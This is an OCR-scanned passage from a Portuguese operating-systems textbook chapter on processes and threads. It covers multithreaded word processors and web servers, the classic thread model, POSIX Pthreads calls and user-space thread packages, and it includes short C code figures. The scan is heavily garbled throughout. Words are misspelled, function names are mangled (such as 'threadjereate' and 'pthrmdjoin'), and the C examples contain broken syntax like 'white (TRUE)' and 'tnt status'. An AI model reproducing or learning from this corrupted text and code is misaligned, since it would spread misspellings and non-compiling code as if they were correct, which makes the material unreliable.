todo o eonie udo ale a pagina 600 — uma siutaęao diffcil, 
porque eie nao sabe qual sera a primeira linha da pagina 
600 enquanto nao tiver processado todas as paginas antę- 
riores. Havera uma demora substancial antes que a pagina 
600 possa ser mostrada, deixando o usuario desconteme. 

Threads, nesse caso, podem aj udar, Suponha quco pro¬ 
cessador de textos seja escrito como um prpgrama de dois 
threads. Um thread imerage com o usuario e o outro faz a 
reformat a ęa o em segundo piano. Logo que uma sentenęa 
e removida da pagina 1, o thread imerativo diz ao thread 
de reform a ta ęao para reforma tar todo o livro. Enąuanto 
isso, o thread interativo continua atendendo ao teclado, 
ao mouse e aos comandos simplcs, como rolar a pagina 
\ r enquanto o outro thread esta processando a todo vapor 
cm segundo piano. Com um pouco dc sortc, a reformata- 
ęao terminara antes quc o usuario peęa para ver a pagina 
600, e, assim, da podcra ser mostrada instantaiieamente. 

Enquanto estamos nesse exemplo, por que nao adirio- 
nar um terceiro thread? Muitos processadores de tcxto sao 
capadlados para salvar automaticamente todo o arquivo 
no disco a cada intcrva!o de tempo cm minutos, a firn de 


proteger o usuario contra a perda de um dia de trabalho, 
caso ocorra uma falha no programa ou no sistema ou mes- 
mo uma queda de energia. O terceiro thread pode fazer os 
backups cm disco sem interferir nos outros dois. A siruaęao 
dos trćs threads esta ilustrada na Figura 2,5. 

Se o programa tivesse apenas um thread, en ta o, sempre 
que um backup de disco se iniriasse, os comandos do tecla- 
do e do mouse seriam ignorados enquamo o backup nao 
terminasse. O usuario certamenie perceberia isso como 
uma queda de desempenho. Por outro lado, os evcntos do 
teclado c do mouse poderiain interromper o backup em 
disco, pcmiitindo um bom desempenho. mas Wando a 
um complcxo modclo de program a ęa o orientado a inter- 
rupęao. Com trćs threads, o modelo dc programaęao lica 
muito mais simplcs. O primeiro thread apenas inlerage 
com o usuario. O segundo reformata o documento ąuando 
pedido. O terceiro escreve periodica nieme o conteudo da 
RAM no disco. 

Devc estar claro que trćs proccssos sep ara dos nao fun- 
cionariam no cxcmplo dado, pois todos os trćs threads pi c- 
risain operar sobi e o documento. Em vcz dc tres proccssos. 
sao tres threads quc compartilham uma memória comum 
e, desse modo, tem todo o acesso ao documento que esta 
sendo editado. 

Uma situ a ęa o analoga ocorre com muitos outros pio- 
gramas ioterativos. Por esemplo, uma planilha eletronica 
ć um programa quc permite quc um usuario mant en ha 
uma matriz, na qual alguns clcmcntos sao dados fornecidos 
pelo usuario. Outros elementos sao calcu la dos com base 
nos dados de entrada, usando-se fórmulas potencialmen- 
te complexas. Quando um usuario altera um elememo, 
muitos outros elementos poderao vir a ser recalculados. Ja 
que existe um thread em segundo piano para fazer o recal- 
eulo, o thread interativo pode posslbilitar a o usuario fazer 
alteraęóes adicionais enquanto a computaęao prossegue. 
Da mesma mancira, um terceiro thread pode cuidar dos 
backups pcriódicos para o disco. 



Figura 2.5 Um processador de textos com tres threads, 
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Agora considere ainda urn outro exemplo no qual os 
threads sao uteis: urn servidor para um site da Web. Re- 
ąuisięoes de paginas chegam a ele, e a pagina reqnisitada 
e enviada de volta ao cliente. Na maioria dos sites da Web, 
algumas paginas apresentam mais accssos quc out ras. Por 
exemplo, a pagina principal da Sony ć rnuito mais acessada 
do que unia pagina cspcdal quc contcnha cspcci fi ca ęoes 
tecnicas de a Ig u ma camera de vfdeo peculiar, io ca li za da nas 
entranhas da arvore que represema o site geral da Sony, 
$ervidores da Web usam esse falo para melhorar o desem- 
penho mamendo u ma cokęao de paginas intensiva menie 
usadas na memória principal para eliminar a neeessidade 
de ir ate o disco busca-las. Essa cokęao e cha mada de ca- 
che e tambem e usada em muitos outros contextos. Yimos 
eaches de CPU no Capitulo 1, por exemplo. 

Um modo de organizar o servidor da Web e mostrado 
na Figura 2.6. Na figura, um thread, o despachante, le 
as reąuisięoes de trabalho que chegam da rede. Depois de 
examinar a reąuisięao, ele escolhe um thread operario 
ocioso (isto e, bloąueado) e entrega-lhe a reąuisięao, pos- 
sivelmente colocando um ponteiro para a mensagem em 
urna palavra espedai associada a cada thread. O despachan¬ 
te cntao acorda o operario quc csta descansando, tirando- 
-o do csta do bloąueado e colocando-o no cstado pronto. 

Quando desperta, o operario verifica se a xequisięao 
pode ser satisfeita pela cache de paginas da Web, a qual 
todos os threads tein acesso, Se nao puder, ele inicializara 
inna operaęao read para obter a pagina do disco e perma- 
necera bloąueado ate a operaęao de disco terminar. En- 
ąnanto o thread estivcr bloąueado na operaęao dc disco, 
outro thread sera cscolhido para cxccutar— possivelmentc 
o despachante, para obter mais trabalho, on possivelmen- 
te outro operario que agora esteja pronto para execuiar, 

Esse modelo permite que o servidor seja escrito como 
uma coleęao de threads seąuenciais* O programa do despa¬ 
chante consistc em um laęo infinito para obter reąuisięoes 
de trabalho e entrega-Ias a um operario, Cada código de 
operario consistc em um laęo infinito, que acata uma re¬ 
ąuisięao de um despachante e verifica se a pagina csta pre- 


Processo de &ervidor Web 



Espaco 
> do 
usuario 


Espaęo 
do 
nucleo 


1 Figura 2.6 Um servidor Web muItithread. 


sente na cache de paginas da Web, Se estiver, entrega-a ao 
cliente e o operario bloąueia esperando uma nova reąuisi- 
ęao. Do conlrario, ele busca a pagina no disco, entrega-a ao 
cliente e bloąueia esperando uma nova reąuisięao. 

Uma simpliflcaęao do código e most rada na Figura 2.7. 
Nesse caso, como no restante desie livro, TRUEć presumh 
do como a constame 1. Alem disso, bufę page sao estru tu ras 
apropriadas para acomodar uma reąuisięao de trabalho e 
uma pagina da Web, respectlvamente. 

Imagine como o servidor da Web poderia ser escrito 
sem threads. Uma possibilidade e operar como um unico 
thread. O laęo principal do servidor da Web obtem unia re¬ 
ąuisięao, examina-a e execuia-a ale o lim antes de obter a 
próxima. Enąuanto espera pdo disco, o servidor esia ocio¬ 
so e nao processa ąuaisąuer outras reąuisięoes. Se o servi- 
dor da Web estiver executando em uma maąuma dedicada, 
como e o normal, a CPU ficara simplesmente ociosa en¬ 
ąuanto o serndor da Web estiver esperando pdo disco. As- 
sim, os threads ganham um desempenho considcravd, mas 
cada um e programado scąucndalmeiitc, como dc costume, 

Ale agora vimos dois prp[etospossiveis: um semdor da 
Web multithread e umservidor da Web monothread. Supo- 
nha que nao seja possivd o uso de threads, mas que os pro- 
jetistas de sistema considerem inaceitavel a perda de desem¬ 
penho decorrente do uso de um linico thread, Se tivermos 
uma versao da chamada de sistema read sem bloąueios, tor- 
na-se possfvel uma terceira abordagem, Quando chega uma 
reąuisięao, um e apenas um thread a verifica, Se ela puder 
ser satisfeita a partir da cache, rnuito bem, mas, se nao pu¬ 
der, sera iniriada uma operaęao de disco sem bloqueio. 

O servidor grava o estado da reąuisięao atual em uma 
tabela e, en ta o, trata o próximo evento, que pode ser tanio 
uma reąuisięao para um novo trabalho como uma respos- 
ta do disco sobre uma operaęao anterior. Se for um novo 
trabalho, de sera iniriado, Se for uma resposta do disco, a 
infotmaęao rdevatue sera buscada na tabela e a resposta 
sera processada. Com a E/S de disco sem bloąueio, uma 


white (TRUE) { 

get next _raquest(&bijf); 
handoff_work(&buf); 

} 


(a) 


while (TRUE) ( 

wait_ for _ work(& buf) 

look for page jn cache (&buf, &page); 

if [page_.not_in_cache(&page)) 

read page from disk(& buf, &page); 
retu m _ pag e(& page); 

} 

(b) 

I Figura 2.7 Uma simpiificaęao do código para a Figura 2.6. 
(a) Thread despachante. |b) Thread operario. 
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resposta co mara, prGvavelmeme, a forma de um sinal on 
de unia imerrupęao. 

Ncssc projcto, o modelo dc 'processo seąuendal' dos 
primdros dois casos esla perdido, 0 estado da computa- 
ęao deve ser explicitameme salvo e resuurado na tabda 
a cada vez que o servidor cbaveia do trabalho de uma 
reąuisięao para ornro. Na verdade, esiamos simulando 
os threads e suas pilhas da maneira diffril. Um projero 
como esse, no qual cada computaęao leni um estado salvo 
e existe um conjunto de eventos que podem ocorrer para 
mudar o estado, e cha mado dc maąuina de estados fi- 
nitos. Essc conccito ć ampłamente usado na cicncia da 
computaęao. 

Agora deve estar claro o que os threads oferecem. 
Eles tornaui possivel inanter a ideia de processos sequen- 
ciais que fazem chamadas de sistema bloąueante (por 
exemplo, E/S de disco) e mesmo assim conseguem obter 
paralelismo. Chamadas dc sistema bloąueante tornam a 
programaęao mais facil, e o paralelismo melhora o desem- 
pcnho, 0 scrvidor monotlircad mantem a simplicidadc 
dc programaęao caraeterfstica das chamadas dc sistema 
bloąueante, mas deixa dc lado o desempenho. A tcrccira 
abordagem consegue um alto desempenho pdo paralelis- 
mo f mas usa chamadas nao bloąueante e mtemipęoes e, 
com isso, toina a programaęao diffcil. Esses modeios sao 
resuniidos na Tabela 2.3. 

Um teredro exemplo cm que threads sao uteis esta 
nas aplicaęoes que dcvem processar uma ąuantidadc min¬ 
io grandę dc dados. A abordagem normal e ler um bloco 
dc dados, proces sad o e, en tao, escreve-lo nova menie. O 
problema e que, se houver someme chamadas de sistema 
com bloąueio, o processo permanecera bloąueado enąua li¬ 
to os dados estiverem chegando e saindo. Ter a CPU ociosa 
quando ha mnitas computaęoes para fazer e obviamente 
desperdfdo c algo que, se possivel deve ser cvitado. 

Os threads oferecem uma soluęao. 0 processo poderia 
ser esmimrado com um thread de entrada, um thread de 
processanienio e um ihread de safda. O thread de entrada 
le os dados em um buffer de entrada. O thread de proces- 
samento tira os dados do buffer de entrada, processa-cs e 
poe os resultados em um buffer de safda. O thread de saf¬ 
da escreve esses resultados de volta no disco. Desse modo. 


Modelo 

Caracterfsticas 

Threads 

Paralelismo, chamadas de 
sistema bloąueante 

Processo monothread 

Nao paralelismo, chamadas de 
sistema bioąueantes 

Maquina de estaefos finitos 

Paralelismo, chamadas nao- 
-blogueantes, interrupęóes 


I Tabela 2.3 Tres modos de construir um servidor. 


entrada, safda e processanienio podem funcionar lodos ao 
mesmo tempo, fi claro quc esse modelo funciona somente 
se uma chama da de sistema bioąueia apenas o thread que 
esta chamando, c nao todo o processo. 

2.2,2 | O modelo de thread dassico 

Agora que compreen demos por que os threads podem 
ser u Leis c como cles podem ser usados, vainos investigar 
a ideia com um pouco mais de atenęao. O modelo de pro¬ 
cesso c Liaseado em dois conceitos independentes: agrupa¬ 
nien l o de rccursos e execuęao. Algumas vczcs ć util sepa- 
ra-los; essc ć o caso dos threads. Primdro examinarcmos o 
modelo dc thread dassico; cm seguida, examinaremos o mo¬ 
delo dc thread Linux, que atenua os limilcs entre processos 
c threads, 

Um modo dc ver um processo e encara-lo como um 
mcio dc agrupar rccursos rei a do na dos. Um processo aprc- 
senta um espaęo dc endereęamento quc contćm o código 
c os dados do próg rama, beni como out r os rccursos, Esses 
rccursos podemser arquivos a bert os, processos filhos, alar- 
rnes pendemes, signal handlers (manipuladores dc sinais), 
informpęao sobre contabilidade, entre o ul r os. Po-los to dos 
juntos na forma de um processo faciliia o gerendameruo 
desses rccursos. 

O ouiro conccito que um processo apresenta e o thread 
dc execuęao, normalmente abreviado apenas para thread. 
Este tern um contador de programa que mantem o com role 
de qual instruęao ele deve executar em seguida. Ele tern 
registradores, que contem suas variaveis de trabalbo atuais. 
Apresenta uma pilha que traza historia da execuęao, com 
uma estrutura para cada rotina charnada mas ainda nao 
retornada. Apesar de um Lhread ter de exccuiar em um 
processo, ambos —o thread e seu processo — sao conceitos 
diferentes e podem ser tratados separadamente. Processos 
sao usados para agrupar rccursos; threads sao as entidades 
escalonadas para a execuęao sobrc a CPU. 

O que os threads acrescentam ao modelo de processo e 
permitir que muitiplas execuęoes ocorram no mesmo am- 
biente do processo, com um grandę gra u de independencia 
uma da ouira. Ter multipłos threads exccutando em parale¬ 
lo em um processo e analogo a multipłos processos execu- 
tando em paralelo cm um iinico computador. No primetro 
caso, os llu eads compartilham um mesmo espaęo de ende- 
reęamemo e ouiros recursos. No ultimo, os processos com¬ 
partilham um espaęo Esico de memória, discos, impresso- 
ras e outros recursos. Como os ilrreads tern algumas das 
propriedades dos processos, eles sao por vezes cha ma dos 
de processos !eves (Hghtmight proces). O lenno multi- 
thread e tambem usado para descrever a siiuaęao em que 
se per mile a existencia de multipłos threads no mesmo 
processo. Como vimos no Capiiulo 1, algumas CPUs tern 
suporte dc hardware direto para multithread e permiicni a 
ocorrencia de chaveamenlo de ihrcads cm uma escala de 
tempo de nanossegundos. 










Sn#w 


Capituto 2 Processos e threads 61 


Na Figura 2.8{a) vemos tres processostradidonais. Gada 
um possui seu próprio cspaęo de endereęamento e um linko 
thread de controle. Por outro lado, na Figura 2.8 (b) vemos 
um linico processo com tres threads de controle. Contudo, 
cm ambos os casos ha tres threads. Na Figura 2.8(a) cada 
um dclcs opera cm um cspaęo dc endereęamento diferente; 
ja na Figura 2,8(b), todos os tres threads compartilliam o 
rnesmo cspaęo de endereęamento. 

Quando um processo com imiltiplos threads e execu- 
tado em um sistema com urna unica CPU, os threads es- 
peram a vez para executar. Na Figura 2.I vimos como a 
multiprogramaęao dc processos funciona. Ao chavear cn- 
tre varios processos, o sistema da a ilusao de processos se- 
ąuenciais dislintos executando cm paralelo, O multithread 
funciona do rnesmo modo. A CPU altcrna rapidameutc en- 
tre os threads, dando a tmpressao dc que estao exectuando 
em paralelo, embora em uma CPU mais lenta que a CPU 
real. Em um processo lim i ta do pela CPU (que realiza maior 
ąuantidade de calculos do que de E/S) com tres threads, 
eles parecem executar em paralelo, cada um em uma CPU 
com um teręo da velocidade da CPU real. 

Threads distintos cm um processo nao sao tao indepen- 
dentes quanio processos distintos, Todos os threads tern exa- 
tameme o rnesmo cspaęo de endereęamemo, o que signiflca 


Processo 1 Processo 2 Processo 3 



Processo 



Figura 2.8 (a) Trśs processos, cada um com um thread. 
I (b) Um processo com tr£s threads. 


que eles tambem compartllham as mesmas variaveisglobais. 
Como cada thread pode ter acesso a qualquer endereęo de 
memória dentro do espaęo de endereęamento do processo, 
um thread pode ler, escrever ou ate rnesmo apagar com- 
pietamente a pillia dc outro thread. Nao ha protcęao entre 
threads porquc (1) c impossivd c (2) nao seria necessario. 
Ja no caso dc processos divcrsos, quc podem ser de usuanos 
diferentes e mutuamente liostis, um processo e sempre pro- 
priedadc de um usuario, que presumWelmente criou miilti- 
plos threads para que eles possam cooperar, e nao competir. 
Alem de compartilhar um espaęo de endereęamento, todos 
os threads companilham o rnesmo conjunto de arquivos 
abertos, processos lilhos, alarmes, sinais etc. r conforme iluś- 
trado na Tabela 2.4. Assim, a organizaęao da Figura 2.8(a) 
seria usada quando os tres processos fossem essendalmente 
descorrclacionados; ja a Figura 2.8(b) seria apropriada qu a li¬ 
do os tres threads fizessem realnienie parte da incsma tarefa 
c cooperassem aliva c intimamente uns com os outros. 

Os itens na primeira coluna sao propriedades dos pro¬ 
cessos, nao propriedades dos threads. Por exemp!o, se um 
thread abre um arquivo f este lica visivel para os outros 
threads no processo e eles podem ler e escrever nele. Isso 
c lógico, pois o processo c a unidade dc gerenciamento de 
recursos, e nao o thread, Sc cada thread tivcssc scu pró¬ 
prio cspaęo de endereęamento, arquivos abertos, alarmes 
pendentes e assim por diante, de seria um processo sepa- 
rado, 0 que estamos tentando conseguir com o concdto de 
thread e a capacidade, para miiltiplos threads de exeeuęao, 
de compartilhar um conjunto de recursos, de forma que 
eles podem cooperar na realizaęao de uma tarefa. 

Assim como cm processos tradidonais (isto ć, um pro¬ 
cesso com apenas um thread), um thread pode estar em 
um dos varios estados: em execuęao, bloqueado, pronto ou 
Fmalizado. U ni thread em execuęao detem a CPU e esta ati- 
vo. Um thread bloqueado esta esperando por algum evento 
que o desbloqueie. Por emnplo, quando um thread rea¬ 
liza uma chamada de sistema para ler a parli r do reda do. 


Itens por processo 

Itens por thread 

Espaęo de endereęamento 

Contador de próg ram a 

Variaveis globais 

Registradores 

Arquivos abertos 

Pilha 

Processos filhos 

Estado 

Alarmes pendentes 


Sinais e manipuladores de sinais 


Informaęao de contabilidade 



Tabela 2.4 A primeira coluna lista alg uns itens 
com partii hados por todos os threads em um processo, 
I A segunda lista alg uns itens especificos a cada thread. 
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ele bloąueia ate que uma emrada seja digitada. Um thread 
pode b!oquear esperando que algum evento externo acon- 
teęa ou que algum outro thread o desbloqueie. Lim thread 
pronto esta escalonado para executar e logo se tornara ati- 
vo, assim quc cli ega r sua vez. As tramięocs entre os estados 
do thread sao as mcsmas transięócs entre os estados dos 
processos ilustradas pela Figura 2*2, 

Ż importante perceber que cada thread tem sua própria 
pilha, conforme mostra a Figura 2.9. Cada pilha de thread 
contem uma estrutura para cada rotina cha ma da, mas que 
ainda nao retomou. Essa estrutura possui as variavds lo- 
cais da rotina c o endereęo de retorno para usa-lo quan- 
do a rotina cha mada trnninar, Por exempio f sc a rotina X 
chamar a rotina V, c cssa cha mar a rotina Z, enquanto Z 
estiverexecutando, as estru luras para X Fe Zestarao todas 
na pilha. Cada thread geralmeme chama rotinas diferemes 
resultando uma historia de execuęao difereme. Por isso e 
que o thread precisa ter sua própria pilha. 

Ouando ocorre a exccuęao de miiltiplos threads, os 
processosnonnalmentc iniciam com um unico thread. Essc 
thread tem a caparidade dc criar novos threads chamando 
uma rotina de bihlioteca — por exemplo, tlmad_creatz, Em 
geral um parametru para threadjereate especifica o nonie 
de uma rotina para um ntwo thread executar. Nao e neces- 
sario (nem mesmo possfvel) especificar qualquer coisa so- 
bre o espaęo de endereęamento do novo thread, ja que ele 
executa automaticamente no espaęo de endereęamento do 
thread em criaęao. Algumas vezes os threads sao hierarqui- 
cos, com um reladonamento pai-filho, mas com frequen- 
da esse reladonamento nao existc\ com todos os threads 
sendo iguais* Com ou sem um reladonamento hicrarąuico, 
a o thread cm criaęao c nonnalmentc ret orna do um identi- 
ficador de thread que da nonie ao novo thread* 

Quando tennina sen trabalho, um thread pode termi- 
nar sua exccuęao chamando uma rotina de bihlioteca — di- 
gamos, thread_?xiL Ele entno desa parę cc e nao ć mais es- 
calonavel. Em alguns sistemas dc thread, um thread pode 
esperarpela salda dc um thread (cspecifico) chamando um 


Thread 2 



1 Figura 2.9 Cada thread tem sua própria piiha. 


procedimento ihreadjcin, por exemplo. Essa rotina bloqueia 
o thread que executou a chamada ate que um thread (espe- 
cffico) tenha tenninado. Sendo assim, a criaęao e o temiino 
do thread sao muito pareddos com a criaęao c o termino de 
processos, i udusi vc com quasc as mes mas opęocs. 

Outra chamada comum de thread e a threadjndd, que 
permite que um thread desista voluntariamente da CPU 
para deixar outro thread ex ecu tar. Essa chamada e impor¬ 
tante porque nao ha uma interrupęao de relógio para for- 
ęar um tempo compartilhado, como existe com processos, 
Assim, e importante que os threads sejam 'cortcscs' c que, 
dc tempos cm temp os, li be rem de modo voliintario a CPU 
para dar a outros threads unia oportunidade para executar* 
Guiras chamadas per'mitem que um thread espere que ou¬ 
tro thread terminc algum trabalho, quc informe a Hnaliza- 
ęao de alguma tarda, e assim por dianie* 

Mesmo sendo uteis em niuitas situaęóes, os threads 
tambćm introduzem varias complicaęoes no modelo de 
programaęao. Só para comeęar, considcre os efcitos da cha¬ 
mada dc sistema fork do UNIX. Se o processo pai tiver nuil- 
tiplos threads, o (ilho nao devcria te-los tambćm? Do eon- 
trario, o processo talvez nao funcione adequadamente, ja 
que todos os threads po dem ser essenoiais. 

Contudo, se o processo lilho possuir tantos threads 
quanto o pal, o que acontecc se um thread no pai cstiver 
hloqueado em uma chamada read do te cła do, por exemplo? 
Agora sao dois threads hloqueados esperando entrada pdo 
teclado, um no pai e outro no fil ho? Quando u ma lin ha for 
digitada, ambos os threads conterao uma cópia dela? So- 
mente o pai? Somente o lilho? O mesmo problema existe 
com as conexóes de rede em aberto. 

Ouira classe de problem as esta reladonada ao fato de 
os threads companilharcm muitas estfuturas de da dos. O 
que acontecc se um thread fechar um arquivo enquanto 
outro estiver ainda lendo esse mesmo arquivo? Suponha 
que urn thread perceba que haja pouca memória e comece 
a alocar mais memória. No tneio dessa tarela, ocorre um 
chaveamenio entre threads, e entao o novo thread percebe 
que ha pouca memória e comeęa lambem a alocar mais. 
Esta provavelmente serd alocada duas vezes. Esses próbie- 
mas podem ser resolvidos com uma cena difkuldade, mas 
programas multithreads devem ser pensados e projetados 
com cuidado para que fundooem corretamcnte* 

2.2.S I Threads POSIX 

Para posstbi li tar criar programas com threads portatds, 
o IEEE definiu um padrao para threads no padrao IEEE 
1003.Ic. O pacDtc dc threads quc dc define e chamado 
de Pthreads, A maioria dos sistemas UNIX o suporta. O 
padrao define mais tle 60 chamadas de funęao, um mi me¬ 
ro muito grandę para ser examinado aqui. Em vez disso, 
apenas descreveremos algumas das principais para dar uma 
ideia de como funcionam. As chamadas que descreveremos 
aqui estao listadas na Tabela 2.5. 
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Chamada de thread 

Oescrięao 

pthread create 

Cria um novo thread 

pthread exit 

Conctui a chamada de thread 

p threadJoin 

Espera que um thread especrfico 
seja abandortado 

pthread_yie!d 

Libera a CPU para que outro 
thread seja exeaitado 

pthread^attr^inlt 

Cria e inicializa uma estrutura de 

atributos do thread 

pthread_attr_de$boy 

Remove uma estrutura de 
atributos do thread 


] Tabela 2.5 Algumas das chamadas de funęao de Pthreads, 


Todos os threads PLhreads tern certas propriedades. 
Ca da um lem om idemificador, um conjunto dc registros 
(uidusive o comador de programa), e um conjunto de atri¬ 
butos, que sao armazenados eni urna estrutura. Os atribu- 
tos induem o tamanho da pilha, os parametros de escalo- 
namento e out ras itens necessarios a utilizaęao do thread. 

Um novo thread e criado tisarnio a chamada pthmd_cmte. 
O idemificador do thread reeem-eriado retorna como o vaior 
da funęao. A chama da. e intendonaimente muiio semelhan- 
te a chamada de sisiema fork, com o idemificador de thread 
desempenhando o papei do PID (numerodo processo), prin- 
dpalmente para identificar threads referenciados em outras 
chamadas* 

Ouando um thread tertninou o traba]ho para o qual 
foi designado, pode conduir chamando pthnad_mt. Essa 
chamada imerrompe o thread e libera sua pilha. 

Muitas vczes um thread precisa espera i por outro para 
terminal seu trabalho e sak antes dc continuar. O thread 
que esta csperando chama pthrmdjoin para espera r que 
um outro thread especifico seja conclmdo. 0 idemificador 
do thread pelo qual se espera e dado como parametru. 

Aigtimas vezes aconiece dc um thread nao esiar logi- 
camente bloąueado, mas notarque foi ex ecu ta do por tem¬ 
po sufidente e que deseja dar a outro thread uma chance 
de ser exeoxtado. Ele pode efetuar essa meta chamando 
pthmd_ykld* Essa chamada nao exisie para processos por- 
que ali a suposięao e de que os processos sao fcroz menie 
conipctitivos e quc cada um deseja todo o tempo da CPU 
que cousiga obter. Contudo, uma vcz que os threads do 
processo esiao trabalhando juntos e que seu código e iu- 
variavdmcme escrito pelo mesmo programa dor, algumas 
vezes o programador quer que des se deem uma chance. 

As dnas chamadas seguintes Udam com atributos. 
pikread_at.tr Jnh cria a estru tura de atributos associada com 
um thread e a inicializa para os valores predefinidos. Esses 
valorcs (como a prioridade) podem ser altcrados manipu- 
lando campos na estrutura de atributos. 


Por firn, pthread_aitr_destroy remove a estrutura de atri¬ 
butos de um thread, libera udo sua memória. Ela nao a feta 
os threads que o utilizam; des continuam existmdo. 

Para perce ber mdhor como os Pthreads funcionam, 
considere o exemplo simplcs da Figura 2 JO. Nessc caso, o 
programa principal realiza NUMBER_OF_THREADS itera* 
ęoes, criando um novo thread em cada Keraęao, depois de 
ammciar sua imcnęao. Sc a criaęao do thread fraeassa, cle 
imprime uma mensagem dc erro c termina cni seguida, 
Após criar todos os threads, o programa principal termina. 

Quando um tliread e criado, cle imprime uma mensa¬ 
gem dc uma linha se apresentando e termina em seguida. 
A ordem na qual as varias mensagens sao imercaladas e 
indeterminada e pode variar em execuęoes consecutivas 
do programa* 

As chamadas de Pthreads deser!Las ameriormemc nao 
sao de nenhuni modo as linicas existentes; ha muitas ou¬ 
tras. Examinaremos algumas dcias mais tardc, depois dc 
discutirmos sincromzaęao de processos e threads, 

_ 2.2.41 Implementaęao de threads no 

espaęo do usuario 

Ha tlois modos principais dc implcmeniar um pacoie 
de threads: no espaęo do usuario e no nucleo. Essa esco- 
Ilia e um pouco controversa e tambem e possfvel uma im- 
plementaęao hibrida. Descreveremos agora esses metodos, 
com suas vantagens e desvantagens. 

O primeiro metodo e inserir o pacoie de threads total- 
mente dentro do cspaęo do usuario (threads dc usuario). O 
nucleo nao e informado sobre des. O que competc ao nu- 
cko e o gereiicianiento comum de processos monoihread, 
A primeira e mais óbvia vantagem e que um pacote de 
threads de usuario pode ser implementado em um siste- 
ma operacional que nao suporte threads. Todos os sistemas 
operacionais cosmmavam ser inseridos nessa categoria, e 
mesmo hojc alguns ainda o sao. Com essa abordagem, os 
threads sao implementados por uma biblioteca. 

Todas essas implementaęoes apresentam a mesma es- 
trutura geral, ilustrada na Figura 2.1 l(a). Os threads exe- 
cutam no topo de um sisiema denominado sistema de tem¬ 
po dc exccuęao (runtime), quc ć uma colcęao dc rotinas quc 
gcrenciam threads. Ja vimos quatro dcles: pthreadjereate, 
pthread_exit, pthreadJoht e thread_yield, mas em geral twis¬ 
tem outros. 

Ouando os threads sao gerendados no espaęo do usua¬ 
rio, cada processo precisa dc sua própria tabela de threads 
para manter o controle dos threads naąuele processo. Essa 
tabela e analoga a tabela de processos do nucleo, exceto 
por manier o controle apenas das propriedades do thread, 
como o comador de programa, o ponteiro de pilha, os re- 
gistradores, o estado e assim por diante. A tabela de threads 
e gercnciada pelo sistema de tempo de execuęao. Quatulo 
um thread vai para o estado pronto ou bloqueado, a infor- 
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#include <pthread.h> 

#indude <stdto.h> 

#mclude <stdlib.h> 

#define NUMBER,OF_THREADS 10 

void *print_hello_world(void *tid) 

{ 

/* Esta funęao imprime o identificador do thread e sai. */ 
printf("Hello World. Greetings from thread %d\n" 1 tid); 
pthread_exit(NULL); 

} 

int main(int argc, char *argv[]) 

{ 

/* G programa principal cria 10 threads e sai. */ 
pthread_t thread$[NUMBER_GF .THREADS]; 
tnt status, i; 

fOr(i=0; i < NUMBER_OF_THREADS; i++) { 
prinlffMain here. Creating thread %d\n'\ i); 

status = pthread_create{&threads[i], NULL, print_hello_world, (void *)i); 
if (status != 0) { 

printffOops. pthread_create returned error codę %d\n'\ status); 
exit(-1); 

> 

} 

exit(NULL); 

} 

1 Figura 2.10 Um exempb de programa usando threads. 


maęao necessaria para remicia-lo e armazenada na tabela 
de threads, exaiameme do mesrno modo como o nucleo 
armazena as informaęoes sobre os proeessos na tabela de 
proeessos. 

Quando um thread biz algo quc possa b!oquea-lo lo- 
ealmcme — por exemplo, espera quc um outro thread cm 
sen processo termine algum trabalho —> cle chama urna 
rotina do sistema de tempo de execuęao. Essa rotina veri- 


fica se o thread deve entrar no esta do bloąucado. Em caso 
afirmativo, ele armazena os regisiradores do thread (isto e, 
seus próprios) na tabela de threads, busca na tabela por um 
thread pronto para executar e recarrega os registradores 
da maąuina com os novos va!ores salvos do thread. Logo 
que o ponteiro de pilha e o contador de programa forem 
alternados, o novo thread rcvivera automaticamente. Se a 
maąuina tivcr unia instruęao quc salve todos os registra- 
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Figura 2.11 (a) Um pacote de thneads de usuario. (b) Um pacote de threads adminrstrado pelo nucleo. 
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dores e outra que carregue todos eles, o chaveamento do 
thread podera ser Eeito em poucas iiistruęoes. Fazer assini o 
chaveamen£o de threads e, pelo menos, de urna ordem de 
magiiinide mais rapida que desviar o controle para o nii- 
clco — c esse ć um forte argumento cni favor dos pacotes 
de thread dc usuario. 

Exisie, contudo, uma diferenęa fundamental entre threads 
c processos. Quando um thread dedde pararde executar — por 
exemplo, quando executa a cham a da thread_ykU —> o có¬ 
digo desta pode salvar a informaęao do thread na própria 
tabela de threads. Mais a ind a; o escalonador de thread 
pode ser cha ma do pelo código da thread_yield para selecio- 
nar um outro thread para execuiar A rodna que $aiva o 
estado do thread e o escalonador sao apenas rotinas locais, 
dc modo quc c muito mais efidente invoca-los do quc fozer 
uma cha mada ao mleko. Entre outras coisas, na o ć neces- 
sario passa r do modo usuario para o modo rui cle o, nao se 
predsa de nenhum chaveamcnto de contexto, a ca che dc 
memória nao ten; dc ser esvaziada e assim por dianie. Isso 
tu do agiliza o escalonamento de threads, 

Threads de usuario Lem tambem outras vantagen$. Por 
exemplo, permitem que ca da processo tenha sen próprio 
algoritmo de escalonamento personalizado* Para alg uma s 
aplicaęoes — como aąuclas com thread coletor de lixo {gar¬ 
bate collector) — o fato dc nao ter dc sc preocupar com um 
thread ser parado em momentos inoportunos cum porno 
positivo. Elcs tambem escalam nidhor, ja que os threads 
dc nucleo invariavelmente necessitam dc algom espaęo de 
tabela e espaęo de pilha no nucleo, o quc pode vir a ser um 
problema caso haja um mi mci o muito grandę de threads. 

Apesar do mdhor desempenho, os pacotes de threads 
de usuario apresemam alguns problemas. O primelro de- 
tes ć como impkmentar as chamadas de sistema com blo¬ 
ąueio. Suponha que um thread esteja lendo o teclado antes 
que qualquer teda tenha sido presstonada. Deixar o thread 
realizar de fato a cha mada de sistema e inaceitavel, pois 
isso parana todos os threads. Uma das prineipais razoes de 
haver threads em primetro lugar e permitir que cada um 
deles possa usar chamadas com bloąueio, mas e tambem 
impedir que um threadbloqueado afete os outros. Em cha¬ 
madas de sistema com bloąueio, e dihcil imaginar como 
esse objetivo pode ser prontamente atingido. 

As chamadas de sistema poderiam ser todas alteradas 
para que nao bloąueassem {porexemplo, um nead no teclado 
relomaria 0 byle se nao houvesse caractcres dispomveis no 
buffer), mas exigir mudanęas no sistema operacional nao e 
interessante. Alem disso, um dos argumentos para threads 
de usuario era j usta menie o fato de pode rexecuta rem siste- 
inas operacionais existentes. Mais ainda: alt era r a semantica 
do read exigira mudanęas em muitos programas de usuario. 

Outra alternatWa surge ąuando se pode aotever se 
uma cha ma da bloqueara. Em algumas versbes do UNIX, 
ha uma cha mada de sistema, a seleci, que permite, a qucm 
chama, saber se um futuro read bloąueara. Quando essa 
chama da esta presente, a rotina de biblioteca read pode ser 


substituida por outra que antes chama select e quc depois 
só chama read se isso for seguro (isto e, se nao causar blo¬ 
